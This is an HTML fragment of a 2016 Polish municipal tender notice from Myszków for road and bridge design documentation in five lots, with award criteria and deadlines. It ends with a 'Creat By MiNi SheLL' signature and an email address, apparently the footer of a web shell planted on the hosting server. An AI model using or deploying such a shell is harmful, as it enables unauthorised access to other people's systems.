<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>?1. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, to Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w trakcie realizacji zamówienia, w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga od Wykonawcy pisemnego zobowiązania tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonywaniu zamówienia, składanego w oryginale albo w kopii poświadczonej notarialnie, zawierającego w swojej treści informacje dotyczące co najmniej: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 2. Pełnomocnictwa winny być załączone do oferty w formie oryginału lub kopii poświadczonej notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Okres gwarancji na wykonaną dokumentację projektowo - kosztorysową  i STWiOR - 2</li>
<li>3 - Czas reakcji Wykonawcy na wezwanie Zamawiającego - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy, 
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie podanym we wzorze umowy, odpowiednim dla danej części zamówienia.
a)	dla części 1 zamówienia - załącznik nr 8 do SIWZ;
b)	dla części 2 zamówienia - załącznik nr 9 do SIWZ,
c)	dla części 3 zamówienia - załącznik nr 10 do SIWZ,
d)	dla części 4 zamówienia - załącznik nr 11 do SIWZ,
e)	dla części 5 zamówienia - załącznik nr 12 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastomyszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego przy ul. Kościuszki nr 26 w Myszkowie
w pokoju 57.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2016 godzina 10:00, miejsce: Siedziba Zamawiającego przy ul. Kościuszki nr 26 w Myszkowie
w pokoju 109 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi w ul. Budowlanej wraz z jej odwodnieniem (jezdnia oraz chodnik w ul. Budowlanej wraz z ich odwodnieniem), wraz decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2019.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Okres gwarancji na wykonaną dokumentację projektowo - kosztorysową  i STWiOR - 2</li>
<li>3. Czas reakcji Wykonawcy na wezwanie Zamawiającego - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi wewnętrznej przy Zespole Szkół Publicznych nr 3 
w Myszkowie wraz z jej odwodnieniem i oświetleniem ulicznym (jezdnia, chodniki oraz parkingi wraz z ich odwodnieniem oraz oświetlenie uliczne/parkowe), wraz 
z decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2019.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Okres gwarancji na wykonaną dokumentację projektowo - kosztorysową  i STWiOR - 2</li>
<li>3. Czas reakcji Wykonawcy na wezwanie Zamawiającego - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi w ul. Siewierskiej wraz z jej odwodnieniem (jezdnia oraz chodniki wraz z ich odwodnieniem), wraz z decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2019.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Okres gwarancji na wykonaną dokumentację projektowo - kosztorysową  i STWiOR - 2</li>
<li>3. Czas reakcji Wykonawcy na wezwanie Zamawiającego - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi w ul. Słowiańskiej wraz z jej odwodnieniem (jezdnia oraz chodnik wraz z ich odwodnieniem), wraz z decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> opis w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Okres gwarancji na wykonaną dokumentację projektowo - kosztorysową  i STWiOR - 2</li>
<li>3. Czas reakcji Wykonawcy na wezwanie Zamawiającego - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dokumentacja projektowo-kosztorysowa i STWiOR do wykonania przebudowy drogi w ul. Włodowskiej wraz z jej odwodnieniem oraz przebudową mostu w ciągu ww. ulicy (na odcinku od ul. Nierada do ul. Nadrzecznej 
- jednia, chodnik, wraz z ich odwodnieniem oraz przebudowa mostu na rzece Warta), wraz z decyzją pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego nad opracowaną dokumentacją.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2019.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Okres gwarancji na wykonaną dokumentację projektowo - kosztorysową  i STWiOR - 2</li>
<li>3. Czas reakcji Wykonawcy na wezwanie Zamawiającego - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com